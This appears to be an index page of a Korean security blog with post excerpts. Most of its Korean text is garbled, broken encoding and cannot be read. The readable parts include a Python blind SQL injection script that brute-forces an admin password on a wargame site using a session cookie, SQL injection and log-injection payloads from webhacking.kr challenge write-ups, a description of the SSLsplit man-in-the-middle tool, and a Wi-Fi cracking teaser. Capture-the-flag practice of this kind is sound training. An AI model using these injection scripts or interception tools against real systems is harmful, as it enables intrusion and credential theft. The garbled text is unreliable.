728x90 ๋ฐ์ํ Lucete278 blind sql injection.py #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and(substring(pw," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) req.add_header('cookie',"ASPSESSIONIDSSATDDSQ=EMNOHBMDIHNLAAFFOHICOODE") res = urllib2.urlop.. Language 2015. 9. 8. base 64 encoding import base64 str64="0cc175b9c0f1b6a831c399e2697726618277e0910d750195b448797616e091ad6f8f57715090da2632453988d9a1501b865c0c0b4ab0e063e5caa3387c1a87417b8b965ad4bca0e41ab51de7b31363a1d41d8cd98f00b204e9800998ecf8427e" # base 64๊ตฌ๋ฌธstr64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Language 2015. 9. 8. SSLsplit SSLsplit ๋คํธ์ํฌ ์ฐ๊ฒฐ์ ์ํธํ SSL / TLS์ ๋ํ man-in-the-middle ๊ณต๊ฒฉํ๊ธฐ์ํ ๋๊ตฌ์ ๋๋ค. ์ฃผ์ ๋ณํ ์์ง์ ํตํด ์ฐจ๋จํ์ฌ SSLsplit๋ก ๋ฆฌ๋๋ ์ ๋ฉ๋๋ค. SSLsplit๋ SS L / TLS๋ฅผ ์ข ๋ฃํ๊ณ ์ ์ก ๋ ๋ชจ๋ ๋ฐ์ดํฐ๋ฅผ ๊ธฐ๋ก ํ ๋ ์๋์ ๋ชฉ์ ์ง ์ฃผ์์ ์๋ก์ด SSL / TLS ์ฐ๊ฒฐ์ ์์ํฉ๋๋ค. SSLsplit๋ ๊ณต๊ฐ ํค ํ ๊ณ ์ ์ ๋ฐฉ์งํ๊ธฐ ์ํด HPKP ์๋ต ํค๋๋ฅผ ์ ๊ฑฐํฉ๋๋ค. ๋์๋ง root@kali:~# sslsplit -h Usage: sslsplit [options...] [proxyspecs...] -c pemfile use CA cert (and key) from pemfile to sign forged certs -k pemfile use CA ke.. Metasploit/Kali & Backtrack 2015. 9. 7. Challenge 36 - Back Up ๋ฌธ์ ์ ๋ค์ด๊ฐ๊ฒ ๋๋ฉด ์ ๋ง์ด ๋์ด๋ค... ์์ค๋ฅผ ๋ด๋ ์๋ฌด๋ง์ด ์๋ค... ๊ทธ์น๋ง vi ๋ก ์์ ํ๋ ๋์ค blackout ์ ์ ์ด ๋ฌ๋ค๋ ๊ฒ์ ์ง์ ํ ์ ์๋ค. ๋ฆฌ๋ ์ค vi๋ฅผ ์ด์ฉํด๋ณด๋ฉด vi ์ฐ๋ ๋์ค ๋ฐฑ์ ํ์ผ๋ก .swp๋ผ๋ ํ์ผ์ด ๋ง๋ค์ด์ง๋ ๊ฒ์ ๋ณผ ์์๋ค. ์ด๋ก ์ฐ๋ฆฌ๋ ์ง์์ผ๋ก /.index.php.swp๋ฅผ ์ ๋ ฅํ๋ฉด(.์ ํ์ฌ ํด๋๋ฅผ ๋ํ๋) good! ์ด๋ผ๊ณ ๋์ค๊ณ password ๋ md5๋ก ๋์ด ์๋ค๊ณ ๋์จ๋ค ์ด๋ก REMOTE_ADDR => IP + dlseprtmvpdlwlfmfquswhgkwkglgl์ md5๋ก ํด์ฌํ ๊ฐ์ด password์ด๋ค. ์ด๋ก ๋ฌธ์ Clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5. Chellenge 39 - ??? ๋ฌธ์ ๋ฅผ ๋ค์ด๊ฐ๋ฉด ๋น์นธ์ด๋ค ๊ทธ๋ผ ์์ค๋ถํฐ๋ณด์!!!์์ค๋ฅผ ํ์ธ ํ๋ฉด index.phps๋ก ์ด๋ ํ๋ผ ํ๋ค. ๋ค์ด๊ฐ์! ๋ค์ด๊ฐ๋ฉด ์ด๋ฌํ ์์ค๊ฐ ๋์ค๋๋ฐ ... ์์ค๋ฅผ ๋ถ์ํด๋ณด์. ์ฌ๊ธฐ์์ mysql_fetch_array()๋ ์๋ฌ๊ฐ ๋จ๋ mysql_fetch_array() ํธ์ถ๋ฌธ์ธ $q=mysql_fetch_array(mysql_query("select 'good' from zmail_member where id='$_POST[id]")); ์์ธํ ์ดํด๋ณด๋ฉด id = '$_POST[id] ์์ ์ฑ๊ธ์ฟผํฐ๊ฐ ๋ซํ ์์ง ์๋ค. ๋ฐ๋ผ์ ์๋ฌ๊ฐ ๋ฐ์ํ๋ ๋ฌธ์ ์ ์ ์ด์ฉํ๋ ๋ฌธ์ ์ด๋ค. ์ด์ ์๋ฌ ๋ถ๋ถ์ ์ฐพ์๊ณ $_POST[id] ์ ๋ํ๊ฑธ ๋ ๋ถ์ํด๋ณด๋ฉด ์ฌ๊ธฐ์ ์ต๋๊ธธ์ด๊ฐ 15๊ธ์๋ผ๊ณ ํ๋ ํํธ๋ฅผ ์ป์ ์ ์๋ค. $_POST.. Wargame/CTF(Capture The Flag) 2015. 9. 5. Challenge 27 - SQL Injection ๋จผ์ 27๋ฒ์ ๋ค์ด๊ฐ๊ฒ ๋๋ฉด ์์ ์ฌ์ง์ฒ๋ผ sql injection๋ฌธ์ ๋ผ๋ ๊ฒ์ ์์ ์๋ค. ์ด์ ์์ค๋ฅผ ๋ณด๊ฒ ๋๋ฉด if(eregi~~~)๋ฅผ ๋ณด๊ฒ ๋๋ฉด union๋ฑ์ ์ฐ๋ฉด no hack ์ด๋ผ๋ ๋ง์ ๋์ฐ๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค. ์ฐ๋ฆฌ๋ admin์ ๊ฐ์ ๋ฐ์ผ๋ฉด ๋ต์ ์ป์ ์์๋๋ฐ ๊ณผ์ฐ ??? ์ฐ๋ฆฌ๋ ์ด์ ์ฟผ๋ฆฌ๋ฌธ์ ๋ฃ์ด injection์ ํด์ผํ๋๋ฐ -1) or no like 1--(๊ณต๋ฐฑ)์ ์ ๋ ฅํ๋ฉด guest๋ผ๋ ๋ง์ด ๋์ค๋ ๊ฒ์ ํ์ธํ ์์๋ค.-1) or no like 1-- ๋ no=1 ์ด๋ผ๋ ์๋ฏธ๋ก ์ด์ guest๊ฐ์ ์ป์ด ๋์ผ๋ -1) or no like 2--(๊ณต๋ฐฑ)์ ์ ๋ ฅํ๋ฉด ๋ฌธ์ Clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5. Challenge10 - buy lotto ๋จผ์ ๋ฌธ์ ๋ค์ด๊ฐ์ ์์ค๋ฅผ ๋ณด๋ฉด ๋ง์ฐ์ค๋ฅผ ์ฌ๋ ธ์ ๊ฒฝ์ฐ 0๊ฐ Y0U๋ก ๋ฐ๋๊ณ 1์ฉ ์ด๋ํ๋ค๊ฐ 800์ด ๋๋ฉด clear๊ฐ ๋๋ค.์ด๋ฌํ๊ฒ ๋์ ์๋ ๊ฒ์ ์ด์ ํ๋ฒ์ฉ ํด๋ฆญ์ ์ธ์์ ๋ด์์~ ํฌ๋กฌ์์๋ script๋ฅผ ์ฝ๊ฒ ๋ฐ๊ฟ์ ์๋ค. ์ด๋ฅผ ์ด์ฉํ์ฌ ๋ ธ๋ ๋ถ๋ถ ์ฆ position:relative:left:0 ์ด๋ถ๋ถ์ 799๋ก ๋ฐ๊พธ์.๊ทธ๋ฆฌ๊ณ 0์ ํ๋ฒ ํด๋ฆญ ํ๋ฉด clear์ธ๋ฐ 0์ด ํด๋ฆญ์ด ์๋๋ค. ๊ทธ๋ผ ์ฝ์์์ hackme.style.posLeft=799๋ฅผ ์ ๋ ฅํ๊ณ ํด๋ฆญํด๋ณด์! -๊ทธ๋ผ ํด๋ฆฌ์ด!!! Wargame/CTF(Capture The Flag) 2015. 9. 5. Challenge 38 - Log Injection webhacking.kr 38๋ฒ ๋ฌธ์ ๋ฅผ ๋จผ์ ๋ณด๊ฒ ๋๋ฉด ์ฌ์ดํธ๋ฅผ ์ ์ํ๊ฒ ๋๋ฉด ์ด๋ฌํ ํ๋ฉด์ด ๋์จ๋ค.์ด๋ก LOG Injection์ด๋ผ๋ ๋ฌธ์ ๋ผ๋ ๊ฒ์ ์ฝ๊ฒ ํ์ธ ํ ์ ์๋ค.๋จผ์ aaaaaaaaa์ ์ ๋ ฅํ์ฌ ์ด๋ ํ ๋ณํ๊ฐ ์๋์ง ํ์ธ ํ์ฌ๋ณด์ ์ ๋ ฅ์ ํ๋ ์๋ฌด๋ฐ ๋ณํ๊ฐ ์๋ ๊ฒ์ ํ์ธ ํ ์์๋ค. ๊ทธ๋ผ admin์ ์ ๋ ฅํ์ฌ ๋ณด๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋์ค๋ ๊ฒ์ ์ ์ ์๋ค. ์ด๋ admin์ด ์๋๋ผ๋ ์๋ฆฌ๋๊น login ์์ ์๋ admin์ ํด๋ฆญ ํด๋ณด์ ๊ทธ๋ผ ์์ ์ ip :aaaaaaaaaa๋ผ๊ณ ์ ๋ ฅํ ๊ธ์ ๋ณผ์ ์๋ค. ๊ทธ๋ผ ๋ค์ ์ฒ์์ผ๋ก ๋์์ ์์ ์ ip:admin์ ์ ๋ ฅํ๋ฉด webhacking.kr ์ ์ฝ๊ฒ clear!!! Wargame/CTF(Capture The Flag) 2015. 9. 5. how to hack wifi using backtrack What You'll NeedUnless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood secur.. Metasploit/Kali & Backtrack 2015. 9. 3. ์ ์ฑ์ฝ๋ ์์ง ๋ฐ ๋ถ์ ๋ฐฉ๋ฒ HONEY POT์ ์ด์ฉํ ์ ์ฑ์ฝ๋ ์์ง - ์ทจ์ฝํ ๊ฐ์ ์์คํ ์ ํตํด ๊ณต๊ฒฉ์๋ฅผ ์ ์ธํ์ฌ ๊ณต๊ฒฉ์์ ๊ณต๊ฒฉ์ ๋ณด๋ฅผ ์์งํ๋ ์์คํ ์ข ๋ฅ KIPPO - ssh๊ธฐ๋ฐ ๊ณต๊ฒฉ ์ ๋ณด๋ฅผ ์์งํ๋ ํ๋ํGlastopf - SQL ์ธ์ ์ ๊ณต๊ฒฉ ์๋ฌผ๋ ์ดํฐ ๊ฐ๋ฅํ ํ๋ํDionaea - HTTP, FTP, SMB ๋ฑ์ ์๋น์ค ๋ฑ์ผ๋ก ์ ๊ทผํ๋ ์ ์ฑ์ฝ๋๋ฅผ ์์งํ๋ ํ๋ํ Honey Client๋ฅผ ์ด์ฉํ ์ ์ฑ์ฝ๋ ์์ง Honey Client๋? ์น ๋ธ๋ผ์ฐ์ ํตํด ํน์ ์น์ฌ์ดํธ๋ฅผ ๋ฐฉ๋ฌธ ํ ๋ฐ์ํ๋ ์ ์ฑํ์ผ์ ๋ฅ๋์ ์ผ๋ก ์์งํ๋ ์์คํ Honey Client ์์ง ๊ณผ์ 1-์น ํฌ๋กค๋ฌ๋ฅผ ํตํด ๋จ์ ํ์ด์ง๊ฐ ์์ง์ด ์๋ url์ ํ์ผ ํ์ฅ๋ช ์ด .exe๋ฑ์ ์์ง2-ํ์ผ ํค๋ ๋ถ๋ถ์ ๊ฒ์ฌํ์ฌ ์คํํ์ผ ์ธ์ง ๊ฒ์ฆ3-๋ฐ์ด๋ฌ์ค ํ ํ ๋๋ ๋ถ์ ํ๊ฒฝ์.. Malware 2015. 9. 3. fedora์์ ๋ core 1,2,3,4 Wargame/CTF(Capture The Flag) 2015. 9. 3. ์ด์์ฒด์ ์ด์์ฒด์ : ์์คํ ์์(ํ๋์จ์ด+์ํํธ์จ์ด)์ ํจ์จ์ ์ผ๋ก ์ฌ์ฉํ๊ณ , ์ปดํจํฐ-์ฌ์ฉ์ ๊ฐ์ ํธ๋ฆฌํ ์ธํฐํ์ด์ค๋ฅผ ์ ๊ณตํ๋ฉฐ์ฒ๋ฆฌ๋ฅ๋ ฅ(Throughput), ์ ๋ขฐ๋(Reliability), ์ฌ์ฉ๊ฐ๋ฅ๋(Availability)์ ํฅ์๊ณผ ๋ฐํ์๊ฐ(Turnaround time)์ ๋จ์ถํ์ฌ ์ฃผ๋ ์ญํ ์ ํ๋ค. (1) ์ด์์ฒด์ ์ ์ฃผ์๊ธฐ๋ฅ โ ํ๋ก์ธ์ค ๊ด๋ฆฌ: ํ๋์จ์ด์ ์์กดํ๋ ๊ฐ์ฅ ํ์ ๋จ์ ์์ค์ผ๋ก ํ๋ก์ธ์ค ์ค์ผ์ค๋ง์ ํตํด ์คํ ๊ฐ๋ฅํ ํ๋ก์ธ์ค๋ฅผ ์ถ์ ๊ด๋ฆฌ ํ๋ค. โก ์ฃผ๊ธฐ์ต์ฅ์น ๊ด๋ฆฌ: ์ฃผ๊ธฐ์ต์ฅ์น์ ์ ๊ทผ์ ๊ด๋ฆฌ ์ ์ดํ๋ ์ฅ์น๋ถ๋ถ์ผ๋ก ์ฃผ์๋ณํ, ๊ธฐ์ต๋ณดํธ, ๋ฒํผ๊ธฐ์ต ๋ฑ์ ๊ธฐ๋ฅ์ ์ํํ๋ค. โข ๋ณด์กฐ๊ธฐ์ต์ฅ์น ๊ด๋ฆฌ: ํ๋๋์คํฌ์ ๊ฐ์ ๋ณด์กฐ ๊ธฐ์ต์ฅ์น์ ๋ํ ์ ๊ทผ๊ด๋ฆฌ, ์ ์ด ๋ฑ์ ์ํํ๋ค. โฃ ์ ์ถ๋ ฅ์์คํ ๊ด๋ฆฌ: ์ค์๊ธฐ์ต์ฅ์น์ ์ธ๋ถ ์ .. Security Study/System Security 2015. 9. 3. ์์คํ ๊ณผ ๊ด๋ จํ ๋ณด์ ๊ธฐ๋ฅ ์์คํ ๊ณผ ๊ด๋ จํ ๋ณด์ ๊ธฐ๋ฅ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ ์ ์ ํ ๊ถํ์ ๊ฐ์ง ์ฌ์ฉ์๋ฅผ ์๋ณํ๊ธฐ ์ํ ๊ฐ์ฅ ๊ธฐ๋ณธ์ ์ธ ์ธ์ฆ ์๋จ ์์คํ ์์๋ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ๊ฐ ๋ณด์์ ์์ ์ธ์ ๊ด๋ฆฌ ์ฌ์ฉ์์ ์์คํ ๋๋ ๋ ์์คํ ๊ฐ์ ํ์ฑํ๋ ์ ์์ ๋ํ ๊ด๋ฆฌ ์ผ์ ์๊ฐ์ด ์ง๋ ๊ฒฝ์ฐ ์ ์ ํ ์ธ์ ์ ์ข ๋ฃํ๊ณ , ๋น ์ธ๊ฐ์์ ์ํ ์ธ์ ๊ฐ๋ก์ฑ๊ธฐ๋ฅผ ํต์ ์ ๊ทผ ์ ์ด ์์คํ ์ด ๋คํธ์ํฌ ์์์ ๋ค๋ฅธ ์์คํ ์ผ๋ก๋ถํฐ ์ ์ ํ ๋ณดํธ๋ ์ ์๋๋ก ๋คํธ์ํฌ ๊ด์ ์์ ์ ๊ทผ์ ํต์ ๊ถํ ๊ด๋ฆฌ ์์คํ ์ ๊ฐ ์ฌ์ฉ์๊ฐ ์ ์ ํ ๊ถํ์ผ๋ก ์ ์ ํ ์ ๋ณด ์์ฐ์ ์ ๊ทผํ ์ ์๋๋ก ํต์ ๋ก๊ทธ ๊ด๋ฆฌ ์์คํ ๋ด๋ถ ํน์ ๋คํธ์ํฌ๋ฅผ ํตํ ์ธ๋ถ์์ ์์คํ ์ ์ด๋ค ์ํฅ์ ๋ฏธ์น ๊ฒฝ์ฐ ํด๋น ์ฌํญ์ ๊ธฐ๋ก ์ทจ์ฝ์ ๊ด๋ฆฌ ์์คํ ์ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ, ์ธ์ ๊ด๋ฆฌ, ์ ๊ทผ ์ ์ด, ๊ถํ ๊ด๋ฆฌ.. Security Study/System Security 2015. 9. 3. ๋ณด์๊ด์ ์ ๊ฐ๋ ๋ณด์์ ๊ฐ๋ - ๋ณด์์ด๋ ํ๋ฝ๋์ง ์์ ์ ๊ทผ, ์์ , ๋ ธ์ถ, ํผ์, ํ๊ดด ๋ฑ์ ๋ค์ํ ์ฌ์ด๋ฒ์์ ์ํ์ผ๋ก๋ถํฐ ์ ๋ณด๋ฅผ ๋ณดํธํ๋ ๊ฒ์ด๋ค. - ๋ณด์์ ์ฌ์ด๋ฒ ๊ณต๊ฐ์์ ์ ๋ณด ๋ณดํธ์ ๋ณด์ ์ ์ฑ ์ ์๋ฆฝํ๊ณ , ์ํ์ ๋ํ ์๋ฐฉ์ฑ ์ ์ธ์ฐ๋ฉฐ, ์์คํ ์ ๋ํ ์ ๊ทผ ๋ฐ ์ด์์ ํต์ ํ๊ณ ์ธ๋ถ์ ์นจ์ ์ด ๋ฐ์ํ์ ๋ ๋น ๋ฅด๊ฒ ํ์งํด ๋์ํ๊ฑฐ๋ ์์๋ ์์คํ ์ ๋ณต๊ตฌํ๋ ๋ฑ์ ๋ค์ํ ํ๋์ด ์๋ค - ๋ณด์์ ์ฌ์ด๋ฒ์์ ๊ฐ์ข ์ํ์ผ๋ก๋ถํฐ ์ ๋ณด๋ฅผ ๋ณดํธํ๊ธฐ ์ํ ๋ค์ํ ํ๋์ ๋งํ๋ค. ๋ณด์๊ด์ ์ ๊ฐ๋ - ํ๊ตญ ์ฐ์ ๋ณด์ ํํ์์๋ “์ ์ฑ ์๋ฐ ๋๋ ์นจ์ ์ผ๋ก๋ถํฐ ์์คํ ๊ณผ ๋คํธ์ํฌ ์์์ ์์์ ๋ง๊ธฐ ์ํด ๊ด์ ๊ฐ ํ์ํ ๋ชจ๋ ์์คํ ์ ์ค์๊ฐ์ผ๋ก ๋ชจ๋ํฐ๋งํ์ฌ ์ฆ๊ฐ ๋์, ๊ด๋ฆฌํ ์ ์๋๋ก ์ ๋ฌธ ๋ณด์ ์ ์ฒด๊ฐ ํด๋น ์ธ๋ ฅ, ์ ์ฐจ, ๊ธฐ์ ๋ฐ ์ ๋ฌธ ์ง์์ ์ .. Security Study/System Security 2015. 9. 3. ๋ฐ์ด๋ฌ์ค ์ข ๋ฅ ๋ฐ์ด๋ฌ์ค• ์ฌ์ฉ์ ์ปดํจํฐ(๋คํธ์ํฌ๋ก ๊ณต์ ๋ ์ปดํจํฐ ํฌํจ) ๋ด์์ ์ฌ์ฉ์ ๋ชฐ๋ ํ๋ก๊ทธ๋จ์ด๋ ์คํ ๊ฐ๋ฅํ ๋ถ๋ถ์ ๋ณํํด ์์ ๋๋ ์์ ์ ๋ณํ์ ๋ณต์ฌํ๋ ํ๋ก๊ทธ๋จ์ด๋ค.• ๊ฐ์ฅ ํฐ ํน์ฑ์ ๋ณต์ ์ ๊ฐ์ผ์ด๋ค. ๋ค๋ฅธ ๋คํธ์ํฌ์ ์ปดํจํฐ๋ก ์ค์ค๋ก ์ ํ๋์ง๋ ์๋๋ค. ์•์ธํฐ๋ท ๋๋ ๋คํธ์ํฌ๋ฅผ ํตํด์ ์ปดํจํฐ์์ ์ปดํจํฐ๋ก ์ ํ๋๋ ์ ์ฑ ํ๋ก๊ทธ๋จ์ด๋ค.• ์๋์ฐ์ ์ทจ์ฝ์ ๋๋ ์์ฉ ํ๋ก๊ทธ๋จ์ ์ทจ์ฝ์ ์ ์ด์ฉํ๊ฑฐ๋ ์ด๋ฉ์ผ์ด๋ ๊ณต์ ํด๋๋ฅผ ํตํด ์ ํ๋๋ฉฐ, ์ต๊ทผ์๋ ๊ณต์ ํ๋ก๊ทธ๋จ(P2P)์ ์ด์ฉํ์ฌ ์ ํ๋๊ธฐ๋ ํ๋ค.•๋ฐ์ด๋ฌ์ค์ ๋ฌ๋ฆฌ ์ค์ค๋ก ์ ํ๋๋ ํน์ฑ์ด ์๋ค. ํธ๋ก์ด ๋ชฉ๋ง• ๋ฐ์ด๋ฌ์ค๋ ์์ฒ๋ผ ์ปดํจํฐ์ ์ง์ ์ ์ธ ํผํด๋ฅผ ์ฃผ์ง๋ ์์ง๋ง, ์ ์์ ์ธ ๊ณต๊ฒฉ์๊ฐ ์ปดํจํฐ์ ์นจํฌํ์ฌ ์ฌ์ฉ์์ ์ปดํจํฐ๋ฅผ ์กฐ์ข ํ ์ ์๋ ํ๋ก๊ทธ๋จ์ด๋ค.• ๊ณ ์์ ์ผ๋ก ๋ง.. Security Study/System Security 2015. 9. 3. ๋ฐ์ด๋ฌ์ค์ ์ ์ ๋ฐ์ด๋ฌ์ค์ ์ ์- ์ ์ฑ์ฝ๋ ์ค์ ๊ฐ์ฅ ๊ธฐ๋ณธ์ ์ธ ํํ- ์ฌ์ฉ์ ์ปดํจํฐ(๋คํธ์ํฌ๋ก ๊ณต์ ๋ ์ปดํจํฐ ํฌํจ) ๋ด์์ ์ฌ์ฉ์ ๋ชฐ๋ ํ๋ก๊ทธ๋จ์ด๋ ์คํ ๊ฐ๋ฅํ ๋ถ๋ถ์ ๋ณํํด ์์ ๋๋ ์์ ์ ๋ณํ์ ๋ณต์ฌํ๋ ํ๋ก๊ทธ๋จ์ ๋งํจ- ์ต์ด์ ์ ์ฑ ์ฝ๋๊ฐ ๋ง๋ค์ง 1980๋ ๋ ์ดํ์์ 2000๋ ๋ ์ด๋ฐ๊น์ง ์ ์ฑ ์ฝ๋์ ์ฃผ๋ฅ๋ฅผ ์ฐจ์ง 1์ธ๋ : ์์ํ ๋ฐ์ด๋ฌ์ค๋ถํธ ๋ฐ์ด๋ฌ์คํ๋กํผ ๋์คํฌ๋ ํ๋ ๋์คํฌ์ ๋ถํธ ์นํฐ์ ๊ฐ์ผ๋๋ ๋ฐ์ด๋ฌ์ค๋ก, ๋ถํ ํ ๋ ์๋์ผ๋ก ๋์* 1๋จ๊ณ : POSTPOST๋ ํ๋์จ์ด ์์ฒด๊ฐ ์์คํ ์ ๋ฌธ์ ๊ฐ ์๋์ง ๊ธฐ๋ณธ ์ฌํญ์ ์ค์ค๋ก ์ฒดํฌํ๋ ๊ณผ์ BIOS์ ์ํด์ ์คํ๋๋๋ฐ, POST ๋์ค ํ๋์จ์ด์์ ๋ฌธ์ ๊ฐ ๋ฐ๊ฒฌ๋๋ฉด ์ฌ์ฉ์์๊ฒ ์ฌ๋ฌ ๋ฐฉ๋ฒ์ผ๋ก ๊ทธ ๋ฌธ์ ๋ฅผ ์๋ฆผ.* 2๋จ๊ณ : CMOSCMOS์์๋ ๊ธฐ๋ณธ ์ฅ์น์ ๋ํ ์ค์ ๊ณผ ๋ถ.. Security Study/System Security 2015. 9. 3. ์์ด๋? ์์ ๋ฑ์ฅ* ์(Worm)์ ์ธํฐ๋ท ๋๋ ๋คํธ์ํฌ๋ฅผ ํตํด์ ์ปดํจํฐ์์ ์ปดํจํฐ๋ก ์ ํ๋๋ ํ๋ก๊ทธ๋จ์ ์๋ฏธ* 1999๋ ๋ค๋ฅธ ์ฌ๋์ ์ด๋ฉ์ผ ์ฃผ์๋ฅผ ์์งํ๊ณ ์ค์ค๋ก ์ ๋ฌ๋๋ ํํ์ ์ธํฐ๋ท ์์ด ์ถํํ๋ฉด์ ์ผ๋ฐ์ธ์๊ฒ ์์ด๋ผ๋ ์ฉ์ด๊ฐ ์๋ ค์ง๊ธฐ ์์* ์ด๋ฉ์ผ์ ์ฒจ๋ถ ํ์ผ ํํ๋ก ์ฒจ๋ถ๋์ด ํ์ฐ๋๊ฑฐ๋, ์ด์์ฒด์ ๋ ํ๋ก๊ทธ๋จ์ ๋ณด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์ค์ค๋ก ์นจํฌํ๋ ๊ฒ์ด ์ผ๋ฐ์ * ํ์ฌ๋ mIRC ์ฑํ ํ๋ก๊ทธ๋จ, P2P ํ์ผ ๊ณต์ ํ๋ก๊ทธ๋จ, ์ด๋ฉ์ผ ๊ด๋ จ ์คํฌ๋ฆฝํธ ๊ธฐ๋ฅ, ๋คํธ์ํฌ ๊ณต์ ๊ธฐ๋ฅ ๋ฑ์ ํ์ ์ ์ด์ฉํ์ฌ ํ์ฐํ๊ณ ์ฆ์ํ๋ ๊ฒฝ์ฐ๋ ์์ด ํผํด์ ๋ถ์์ฉ์ ๋ฒ์/ํฌ๊ธฐ๊ฐ ๊ณ์ ์ปค์ง๊ณ ์์. MASS Mailerํ ์* MASS Mailerํ ์์ ์๊ธฐ ์์ ์ ํฌํจํ๋ ๋๋ ๋ฉ์ผ ๋ฐ์ก์ ํตํด ํ์ฐ* ์ต๊ทผ ๋ฐ์ํ ์ ์ค ์ฝ 40%.. Security Study/System Security 2015. 9. 3. ๋คํธ์ํฌ ์ํ ์ ๊ฒ ๋คํธ์ํฌ ์ํ ์ ๊ฒํ๊ธฐ์์คํ ์์๋ netstat์ ๊ฐ์ ๋ช ๋ น์ผ๋ก ์ด๋ ค ์๋ ํฌํธ๋ฅผ ํ์ธํ ์ ์์. ๋คํธ์ํฌ ์ํ ์ ๊ฒํ๊ธฐ* ์ ์ฑ์ฝ๋๊ฐ ์ฌ์ฉํ๋ ํฌํธ๋ฅผ ํ์ธํ๊ธฐ ์ด๋ ค์ด ๊ฒฝ์ฐ CPorts์ ๊ฐ์ ํ๋ก๊ทธ๋จ์ ์ฌ์ฉํ์ฌ ์๋น์ค ํฌํธ๋ณ๋ก ์ฌ์ฉํ๋ ์์ฉ ํ๋ก๊ทธ๋จ์ ํ์ธํ ์ ์์.* BackDoor-DVR๋ฅผ ์คํํ ๋ค CPorts์์ ํ์ฑํ๋ ๋คํธ์ํฌ ํญ๋ชฉ์ ์ดํด๋ณด๋ฉด ํน์ดํ ์ฐ๊ฒฐ์ด ์กด์ฌ ์ ์์ ์ธ ํ๋ก์ธ์ค์ ๋น๊ตํ๊ธฐ* ์๋์ฐ์ ์ ๋์ค ์์คํ ๋ฑ์ ์ ์์ ์ธ ํ๋ก์ธ์ค๋ฅผ ์ธ์๋๋ฉด ๋น์ ์์ ์ธ ํ๋ก์ธ์ค๋ฅผ ์๋ณํ๋ ๋ฐ ๋ง์ ๋์์ด ๋จ.* ์๋์ฐ ์์คํ ์ด ๋์ํ๊ธฐ ์ํ ๊ธฐ๋ณธ ํ๋ก์ธ์ค - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : ์๋์ฐ ์ฝ์์ ๊ด์ฅํ๊ณ , ์ค๋ ๋๋ฅผ ์์ฑ·์ญ์ ํ๋ฉฐ.. Security Study/System Security 2015. 9. 3. ์ ์ฑ์ฝ๋ ๋์ ๋คํธ์ํฌ ์ํ ์ ๊ฒํ๊ธฐ์์คํ ์์๋ netstat์ ๊ฐ์ ๋ช ๋ น์ผ๋ก ์ด๋ ค ์๋ ํฌํธ๋ฅผ ํ์ธํ ์ ์์. ๋คํธ์ํฌ ์ํ ์ ๊ฒํ๊ธฐ* ์ ์ฑ์ฝ๋๊ฐ ์ฌ์ฉํ๋ ํฌํธ๋ฅผ ํ์ธํ๊ธฐ ์ด๋ ค์ด ๊ฒฝ์ฐ CPorts์ ๊ฐ์ ํ๋ก๊ทธ๋จ์ ์ฌ์ฉํ์ฌ ์๋น์ค ํฌํธ๋ณ๋ก ์ฌ์ฉํ๋ ์์ฉ ํ๋ก๊ทธ๋จ์ ํ์ธํ ์ ์์.* BackDoor-DVR๋ฅผ ์คํํ ๋ค CPorts์์ ํ์ฑํ๋ ๋คํธ์ํฌ ํญ๋ชฉ์ ์ดํด๋ณด๋ฉด ํน์ดํ ์ฐ๊ฒฐ์ด ์กด์ฌ ์ ์์ ์ธ ํ๋ก์ธ์ค์ ๋น๊ตํ๊ธฐ* ์๋์ฐ์ ์ ๋์ค ์์คํ ๋ฑ์ ์ ์์ ์ธ ํ๋ก์ธ์ค๋ฅผ ์ธ์๋๋ฉด ๋น์ ์์ ์ธ ํ๋ก์ธ์ค๋ฅผ ์๋ณํ๋ ๋ฐ ๋ง์ ๋์์ด ๋จ.* ์๋์ฐ ์์คํ ์ด ๋์ํ๊ธฐ ์ํ ๊ธฐ๋ณธ ํ๋ก์ธ์ค - Csrss.exe(Client/Server Runtime SubSystem : Win 32) : ์๋์ฐ ์ฝ์์ ๊ด์ฅํ๊ณ , ์ค๋ ๋๋ฅผ ์์ฑ·์ญ์ ํ๋ฉฐ.. Security Study/System Security 2015. 9. 3. hash? ํด์์ ์ ์ํ๋์ ๋ฌธ์์ด์, ์ด๋ฅผ ์์งํ๋ ๋ ์งง์ ๊ธธ์ด์ ๊ฐ์ด๋ ํค๋ก ๋ณํํ๋ ๊ฒ ํด์์ ํน์ง* ์ธ ํ๋ฌธ์ ๊ธธ์ด๊ฐ ๋ค๋ฅด์ง๋ง ํด์ ๊ฒฐ๊ณผ๋ 32๊ฐ์ ๋ฌธ์๋ก ๊ธธ์ด๊ฐ ๋ชจ๋ ๊ฐ์. * ๋ํ ๋์งธ์ ์ธ์งธ ํ๋ฌธ์ ๋จ์ด ํ๋๋ง ๋ค๋ฅผ ๋ฟ์ธ๋ฐ ํด์ ๊ฒฐ๊ณผ๊ฐ ์์ ํ ๋ค๋ฆ. * ์ด์ ๊ฐ์ ๊ฒฐ๊ณผ๋ ํด์๊ฐ์ ํตํด ํด์๋๊ธฐ ์ ์ ๊ฐ์ ์ถ์ธกํ๋ ๊ฒ์ด ๋ถ๊ฐ๋ฅํ๊ฒ ํ๋ ํด์์ ํน์ฑ ๋๋ฌธ์. MD5* 32๊ฐ์ 16์ง์๋ก ์ด๋ฃจ์ด์ก์. * 16³² = 340,282,366,920,938,463,463,374,607,431,768,211,456 ๊ฐ์ ๊ฒฐ๊ณผ๊ฐ์ด ์กด์ฌ * ์ด ์๋ ์ถฉ๋ถํ ์ปค ๋ณด์ด์ง๋ง ๋ฌดํ์ ์๋. * ๋ฐ๋ผ์ 